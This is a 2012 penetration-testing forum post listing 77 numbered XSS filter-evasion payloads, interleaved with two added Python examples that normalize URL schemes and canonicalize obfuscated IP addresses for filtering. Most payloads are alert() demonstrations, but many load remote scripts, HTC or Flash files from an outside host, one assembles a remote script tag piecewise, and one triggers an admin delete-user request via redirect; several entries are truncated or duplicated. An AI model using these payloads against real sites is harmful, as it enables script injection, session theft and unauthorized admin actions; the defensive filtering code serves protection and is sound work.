中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
Title: XSS cross-site scripting attack roundup
It seems t00ls has fairly little material on XSS; I saw something good and copied it over, not sure whether any of you need it for reference.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline injected JavaScript; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically do not work domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
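
Items 3 through 19 are all the same javascript: URL disguised by case changes, HTML character references (with and without semicolons), embedded tab, newline and carriage-return characters, null bytes and leading whitespace, which is why a filter that looks for the literal string "javascript:" misses them. The Python below is an added example written for this page, not code from the original post: it reduces an attribute value to the form a browser actually acts on (decode character references, drop control characters, lower-case) and only then checks the scheme against an allow list. The sample strings are constructed here and example.com is a placeholder.

```python
import html
import re
from typing import Dict, Optional, Tuple

# A browser's URL parser removes tab, LF and CR anywhere in a URL and strips
# leading/trailing C0 controls and spaces; legacy browsers also ignored NUL.
# This filter is deliberately stricter: every control character is dropped.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")

# Schemes acceptable in an attribute the browser navigates to or loads from
# (href, src, background, action ...). Everything else, including javascript:,
# vbscript: and data:, is refused.
ALLOWED_SCHEMES = {"http", "https"}


def normalize_url(value: str) -> str:
    """Reduce an attribute value to the form the browser would act on."""
    # Resolve HTML character references first. html.unescape also decodes
    # numeric references written without a trailing semicolon ("&#x6A").
    decoded = html.unescape(value)
    # Drop control characters wherever they appear, then lower-case so that
    # mixed-case schemes ("JaVaScRiPt:") compare equal.
    return _CONTROL_CHARS.sub("", decoded).lower()


def url_scheme(value: str) -> Optional[str]:
    """Scheme the browser would see, or None for a relative URL."""
    match = _SCHEME.match(normalize_url(value))
    return match.group(1) if match else None


def is_safe_url(value: str) -> bool:
    """Accept relative URLs and allow-listed schemes only."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed samples mirroring the obfuscations listed above. The decimal and
# hex entity strings both spell out "javascript:alert(1)".
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "decimal_entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
    "hex_no_semicolons": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74"
                         "&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x31&#x29",
    "embedded_tab": "jav\tascript:alert('XSS')",
    "embedded_newline": "jav\nascript:alert('XSS')",
    "embedded_cr": "jav\rascript:alert('XSS')",
    "null_byte": "java\x00script:alert('XSS')",
    "leading_space_and_meta": "&#14;   javascript:alert('XSS')",
    "vbscript": "vbscript:msgbox(\"XSS\")",
    "https": "https://example.com/page",
    "relative": "/images/logo.png",
    "scheme_relative": "//example.com/x.js",
}


def classify_samples() -> Dict[str, Tuple[Optional[str], bool]]:
    """Map each sample name to (detected scheme, filter verdict)."""
    return {name: (url_scheme(v), is_safe_url(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (scheme, safe) in classify_samples().items():
        print(f"{name:24} scheme={scheme!s:12} safe={safe}")
```

The order of the steps matters: decoding entities before stripping controls is what catches "&#14;", and stripping before lower-casing is what catches "jav\tascript". Relative and scheme-relative URLs pass this check because it only decides whether a scheme may run code; where the link actually points is a separate question.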

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra opening angle brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (anything made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside the Flash file lets you smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and load it from there
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
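
Items 70 through 73 hide a link's destination by writing the IPv4 address as a single decimal number or as hexadecimal, octal or mixed components, and item 76 relies on the trailing dot of an absolute DNS name. The Python below is an added example, not code from the original post: it applies the component rules of the URL standard's IPv4 parser (0x prefix is hex, a leading zero is octal, anything else is decimal, and the last component fills the remaining bytes) so that every spelling of a host reduces to one canonical form that a link checker or outbound-request filter can compare against a block list. The sample URLs are constructed here.

```python
import ipaddress
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Component grammar of the URL standard's IPv4 parser. The patterns are strict
# so that signs, whitespace and underscores (which int() would accept) are rejected.
_HEX = re.compile(r"^0[xX][0-9a-fA-F]*$")
_OCT = re.compile(r"^0[0-7]+$")
_DEC = re.compile(r"^[0-9]+$")


def _ipv4_number(part: str) -> int:
    if _HEX.match(part):
        return int(part[2:] or "0", 16)     # "0x" alone is 0
    if _OCT.match(part):
        return int(part, 8)
    if _DEC.match(part):
        return int(part, 10)
    raise ValueError(part)                  # not a numeric component


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of a numeric host, or None if the host is not one.

    One to four components are allowed; the last one fills the remaining bytes,
    so "127.1" is 127.0.0.1 and "3232235521" is 192.168.0.1.
    """
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":   # tolerate one trailing dot
        parts.pop()
    if not 1 <= len(parts) <= 4:
        return None
    try:
        numbers = [_ipv4_number(p) for p in parts]
    except ValueError:
        return None
    if any(n > 255 for n in numbers[:-1]) or numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))


def canonical_host(url: str) -> Optional[str]:
    """Host of a link in canonical form: numeric spellings become a dotted quad,
    names are lower-cased (urlsplit does that) and lose a trailing dot."""
    host = urlsplit(url).hostname
    if host is None:
        return None
    return canonical_ipv4(host) or host.rstrip(".")


def points_at_private_network(url: str) -> bool:
    """True when the canonical host is a loopback or private (RFC 1918) address."""
    host = canonical_host(url)
    if host is None:
        return False
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:            # a DNS name, not an address literal
        return False


# Constructed sample links in the spellings listed above.
SAMPLES = [
    "http://3232235521/",           # decimal
    "http://0xc0.0xa8.0x00.0x01/",  # hexadecimal
    "http://0300.0250.0000.0001/",  # octal
    "http://66.000146.0x7.147/",    # mixed decimal / octal / hex
    "http://www.google.com./",      # absolute DNS name with trailing dot
    "//www.google.com/",            # scheme-relative
]


def canonical_hosts(urls: List[str] = SAMPLES) -> List[Optional[str]]:
    return [canonical_host(u) for u in urls]


if __name__ == "__main__":
    for url, host in zip(SAMPLES, canonical_hosts()):
        print(f"{url:32} -> {host}  private={points_at_private_network(url)}")
```

The first three samples all canonicalize to 192.168.0.1 and the mixed form to 66.102.7.147, so a filter comparing canonical hosts treats them as the same destination however they are spelled. Hosts with a malformed component (a digit 8 or 9 after a leading zero, for instance) are returned as names rather than addresses, so a strict deployment should additionally reject any host that is not a resolvable name.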

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS name)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>


Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2